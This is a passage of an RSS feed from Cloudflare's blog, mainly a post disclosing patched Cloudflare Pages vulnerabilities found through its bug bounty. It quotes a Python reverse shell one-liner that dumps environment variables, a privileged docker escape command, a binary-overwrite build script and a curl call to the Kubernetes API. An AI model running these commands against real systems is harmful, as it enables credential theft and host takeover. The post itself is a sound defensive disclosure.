    <p>As we begin executing, you’ll notice that each product will slowly become more and more similar as we unlock features for each platform until they’re ready to be one such as git integration for your Workers and a config file for your Pages projects!</p><p>Keep an eye out on <a href="https://twitter.com/CloudflareDev">Twitter</a> to hear about the newest capabilities and more on what’s to come in every milestone.</p>
    <div>
      <h2>Have thoughts?</h2>
      <a href="#have-thoughts">
        
      </a>
    </div>
    <p>Of course, we wouldn’t be able to build an amazing platform without first listening to the voice of our community. In fact, <a href="https://docs.google.com/forms/d/1I48UoUpCH6GS1pkZJ_B0W-lTXqn1LeoHp8ILJlRo5dY/viewform?edit_requested=true">we’ve put together a survey</a> to collect more information about our users and receive input on what you’d like to see. If you have a few minutes, you can fill it out or reach out to us on the <a href="https://discord.com/invite/cloudflaredev">Cloudflare Developers Discord</a> or <a href="https://twitter.com/cloudflaredev">Twitter @CloudflareDev</a>.</p> ]]></content:encoded>
            <category><![CDATA[Developer Week]]></category>
            <category><![CDATA[Developers]]></category>
            <guid isPermaLink="false">13ljyrS4VKTddHw6qlhWyw</guid>
            <dc:creator>Nevi Shah</dc:creator>
            <dc:creator>Natalie Rogers</dc:creator>
        </item>
        <item>
            <title><![CDATA[The Cloudflare Bug Bounty program and Cloudflare Pages]]></title>
            <link>https://blog.cloudflare.com/pages-bug-bounty/</link>
            <pubDate>Fri, 06 May 2022 13:00:00 GMT</pubDate>
            <description><![CDATA[ The Cloudflare Bug Bounty has resulted in numerous security improvements to Cloudflare Pages ]]></description>
            <content:encoded><![CDATA[ <p></p><p><i>The Cloudflare Pages team recently collaborated closely with security researchers at</i> <a href="https://assetnote.io/"><i>Assetnote</i></a> <i>through our</i> <a href="https://hackerone.com/cloudflare"><i>Public Bug Bounty</i></a><i>. Throughout the process we found and have fully patched vulnerabilities discovered in Cloudflare Pages. You can read their detailed</i> <a href="https://blog.assetnote.io/2022/05/06/cloudflare-pages-pt1/"><i>write-up here</i></a><i>. There is no outstanding risk to Pages customers. In this post we share information about the research that could help others make their infrastructure more secure, and also highlight our bug bounty program that helps to make our product more secure.</i></p><p>Cloudflare cares deeply about security and protecting our users and customers — in fact, it’s a big part of the reason we’re here. But how does this manifest in terms of how we run our business? There are a number of ways. One very important prong of this is our <a href="/cloudflare-bug-bounty-program/">bug bounty program</a> that facilitates and rewards security researchers for their collaboration with us.</p><p>But we don’t just fix the security issues we learn about — in order to build trust with our customers and the community more broadly, we are transparent about incidents and bugs that we find.</p><p>Recently, we worked with a group of researchers on improving the security of Cloudflare Pages. This collaboration resulted in several security vulnerability discoveries that we quickly fixed. We have no evidence that malicious actors took advantage of the vulnerabilities found. Regardless, we notified the limited number of customers that might have been exposed.</p><p>In this post we are publicly sharing what we learned, and the steps we took to remediate what was identified. We are thankful for the collaboration with the researchers, and encourage others to <a href="http://hackerone.com/cloudflare">use the bounty program</a> to work with us to help us make our services — and by extension the Internet — more secure!</p>
    <div>
      <h2>What happens when a vulnerability is reported?</h2>
      <a href="#what-happens-when-a-vulnerability-is-reported">
        
      </a>
    </div>
    <p>Once a vulnerability has been reported via HackerOne, it flows into our vulnerability management process:</p><ol><li><p>We investigate the issue to understand the criticality of the report.</p></li><li><p>We work with the engineering teams to scope, implement, and validate a fix to the problem. For urgent problems we start working with engineering immediately, and less urgent issues we track and prioritize alongside engineering’s normal bug fixing cadences.</p></li><li><p>Our Detection and Response team investigates high severity issues to see whether the issue was exploited previously.</p></li></ol><p>This process is flexible enough that we can prioritize important fixes same-day, but we never lose track of lower criticality issues.</p>
    <div>
      <h2>What was discovered in Cloudflare Pages?</h2>
      <a href="#what-was-discovered-in-cloudflare-pages">
        
      </a>
    </div>
    <p>The Pages team had to solve a pretty difficult problem for Cloudflare Builds (our <a href="https://www.cloudflare.com/learning/serverless/glossary/what-is-ci-cd/">CI/CD build pipeline</a>): how can we run untrusted code safely in a multi-tenant environment? Like all complex engineering problems, getting this right has been an iterative process. In all cases, we were able to quickly and definitively address bugs reported by security researchers. However, as we continued to work through reports by the researchers, it became clear that our initial build architecture decisions provided too large an <a href="https://www.cloudflare.com/learning/security/what-is-an-attack-surface/">attack surface</a>. The Pages team pivoted entirely and re-architected our platform in order to use gVisor and further isolate builds.</p><p>When determining impact, it is not enough to find no evidence that a bug was exploited, <i>we must conclusively prove that it was not exploited</i>. For almost all the bugs reported, we found definitive signals in audit logs and were able to correlate that data exclusively against activity by trusted security researchers.</p><p>However, for one bug, <i>while we found no evidence that the bug was exploited beyond the work of security researchers</i>, we were not able meaningfully prove that it was not. In the spirit of full transparency, we notified all Pages users that may have been impacted.</p><p>Now that all the issues have been remedied, and individual customers have been notified, we’d like to share more information about the issues.</p>
    <div>
      <h3>Bug 1: Command injection in CLONE_REPO</h3>
      <a href="#bug-1-command-injection-in-clone_repo">
        
      </a>
    </div>
    <p>With a flaw in our logic during build initialization, it was possible to execute arbitrary code, echo environment variables to a file and then read the contents of that file.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4xCsRLGOMLRsVRAAbQBjXM/98cc4254afa79a1e21b503f2a3cb94a4/image2-1.png" />
            
            </figure><p>The crux of the bug was that <code>root_dir</code> in this line of code was attacker controlled. After gaining control the researcher was able to specially craft a malicious <code>root_dir</code> to dump the environment variables of the process to a file. Those environment variables contained our GitHub bot’s authorization key. This would have allowed the attacker to read the repositories of other Pages' customers, and many of those repositories are private.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/61X1OXGLWGeBCkSmeQb8nj/275441334f56e028dd27971b642a2317/image1-6.png" />
            
            </figure><p>After fixing the input validation for this field to prevent the bug, and rolling the disclosed keys, we investigated all other paths that had ever been set by our Pages customers to see if this attack had ever been performed by any other (potentially malicious) security researchers. We had logs showing that this was the first this particular attack had ever been performed, and responsibly reported.</p>
    <div>
      <h3>Bug 2: Command injection in PUBLISH_ASSETS</h3>
      <a href="#bug-2-command-injection-in-publish_assets">
        
      </a>
    </div>
    <p>This bug is nearly identical to the first one, but on the publishing step instead of the clone step. We went to work rotating the secrets that were exposed, fixing the input validation issues, and rotating the exposed secrets. We investigated the Cloudflare audit logs to confirm that the sensitive credentials had not been used by anyone other than our build infrastructure, and within the scope of the security research being performed.</p>
    <div>
      <h3>Bug 3: Cloudflare API key disclosure in the asset publishing process</h3>
      <a href="#bug-3-cloudflare-api-key-disclosure-in-the-asset-publishing-process">
        
      </a>
    </div>
    <p>While building customer pages, a program called /opt/pages/bin/pages-metadata-generator is involved. This program had the Linux permissions of 777, allowing all users on the machine to read the program, execute the program, but most importantly overwrite the program. If you can overwrite the program prior to its invocation, the program might run with higher permissions when the next user comes along and wants to use it.</p><p>In this case the attack is simple. When a Pages build runs, the following <code>build.sh</code> is specified to run, and it can overwrite the executable with a new one.</p>
            <pre><code>#!/bin/bash
cp pages-metadata-generator /opt/pages/bin/pages-metadata-generator</code></pre>
            <p>This allows the attacker to provide their own <code>pages-metadata-generator</code> program that is run with a populated set of environment variables. The proof of concept provided to Cloudflare was this minimal reverse shell.</p>
            <pre><code>#!/bin/bash
echo "henlo fren"
export &gt; /tmp/envvars
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("x.x.x.x.x",9448));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'</code></pre>
            <p>With a reverse shell, the attackers only need to run `env` to see a list of environment variables that the program was invoked with. We fixed the file permissions of the process, rotated the credentials, and investigated in Cloudflare audit logs to confirm that the sensitive credentials had not been used by anyone other than our build infrastructure, and within the scope of the security research.</p>
    <div>
      <h3>Bug 4: Bash path injection</h3>
      <a href="#bug-4-bash-path-injection">
        
      </a>
    </div>
    <p>This issue was very similar to Bug 3. The PATH environment variable contained a large set of directories for maximum compatibility with different developer tools.</p><p><code>PATH=/opt/buildhome/.swiftenv/bin:/opt/buildhome/.swiftenv/shims:/opt/buildhome/.php:/opt/buildhome/.binrc/bin:/usr/local/rvm/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/buildhome/.cask/bin:/opt/buildhome/.gimme/bin:/opt/buildhome/.dotnet/tools:/opt/buildhome/.dotnet</code></p><p>Unfortunately not all of these directories were set to the proper filesystem permissions allowing a malicious version of the program bash to be written to them, and later invoked by the Pages build process. We patched this bug, rotated the impacted credentials, and investigated in Cloudflare audit logs to confirm that the sensitive credentials had not been used by anyone other than our build infrastructure, and within the scope of the security research.</p>
    <div>
      <h3>Bug 5: Azure pipelines escape</h3>
      <a href="#bug-5-azure-pipelines-escape">
        
      </a>
    </div>
    <p>Back when this research was conducted we were running Cloudflare Pages on Azure Pipelines. Builds were taking place in highly privileged containers and the containers had the docker socket available to them. Once the researchers had root within these containers, escaping them was trivial after installing docker and mounting the root directory of the host machine.</p>
            <pre><code>sudo docker run -ti --privileged --net=host -v /:/host -v /dev:/dev -v /run:/run ubuntu:latest</code></pre>
            <p>Once they had root on the host machine, they were able to recover Azure DevOps credentials from the host which gave access to the Azure Organization that Cloudflare Pages was running within.</p><p>The credentials that were recovered gave access to highly audited APIs where we could validate that this issue was not previously exploited outside this security research.</p>
    <div>
      <h3>Bug 6: Pages on Kubernetes</h3>
      <a href="#bug-6-pages-on-kubernetes">
        
      </a>
    </div>
    <p>After receipt of the above bugs,  we decided to change the architecture  of Pages. One of these changes was migration of the product from Azure to Kubernetes, and simplifying the workflow, so the attack surface was smaller and defensive programming practices were easier to implement. After the change, Pages builds are within Kubernetes Pods and are seeded with the minimum set of credentials needed.</p><p>As part of this migration, we left off a very important iptables rule in our Kubernetes control plane, making it easy to <code>curl</code> the Kubernetes API and read secrets related to other Pods in the cluster (each Pod representing a separate Pages build).</p>
            <pre><code>curl -v -k [http://10.124.200.1:10255/pods](http://10.124.200.1:10255/pods)</code></pre>
            <p>We quickly patched this issue with iptables rules to block network connections to the Kubernetes control plane. One of the secrets available to each Pod was the GitHub OAuth secret which would have allowed someone who exploited this issue to read the GitHub repositories of other Pages' customers.</p><p>In the previously reported issues we had robust logs that showed us that the attacks that were being performed had never been performed by anyone else. The logs related to inspecting Pods were not available to us, so we decided to notify all Cloudflare Pages customers that had ever had a build run on our Kubernetes-based infrastructure. After patching the issue and investigating which customers were impacted, we emailed impacted customers on February 3 to tell them that it’s possible someone other than the researcher had exploited this issue, because our logs couldn’t prove otherwise.</p>
    <div>
      <h2>Takeaways</h2>
      <a href="#takeaways">
        
      </a>
    </div>
    <p>We are thankful for all the security research performed on our Pages product, and done so at such an incredible depth. CI/CD and build infrastructure security problems are notoriously hard to prevent. A bug bounty that incentivizes researchers to keep coming back is invaluable, and we appreciate working with researchers who were flexible enough to perform great research, and work with us as we re-architected the product for more robustness. An in-depth write-up of these issues is available from the Assetnote team on <a href="https://blog.assetnote.io/2022/05/06/cloudflare-pages-pt1/">their website</a>.</p><p>More than this, however, the work of all these researchers is one of the best ways to test the security architecture of any product. While it might seem counter-intuitive after a post listing out a number of bugs, all these diligent eyes on our products allow us to feel much more confident in the security architecture of Cloudflare Pages. We hope that our transparency, and our description of the work done on our security posture, enables you to feel more confident, too.</p><p>Finally: if you are a security researcher, we’d love to work with you to make our products more secure. Check out <a href="https://hackerone.com/cloudflare">hackerone.com/cloudflare</a> for more info!</p> ]]></content:encoded>
            <category><![CDATA[Bug Bounty]]></category>
            <category><![CDATA[Vulnerabilities]]></category>
            <category><![CDATA[Security]]></category>
            <guid isPermaLink="false">1EuGlcHFo9aPl8DaujMbpQ</guid>
            <dc:creator>Evan Johnson</dc:creator>
            <dc:creator>Natalie Rogers</dc:creator>
        </item>
    </channel>
</rss>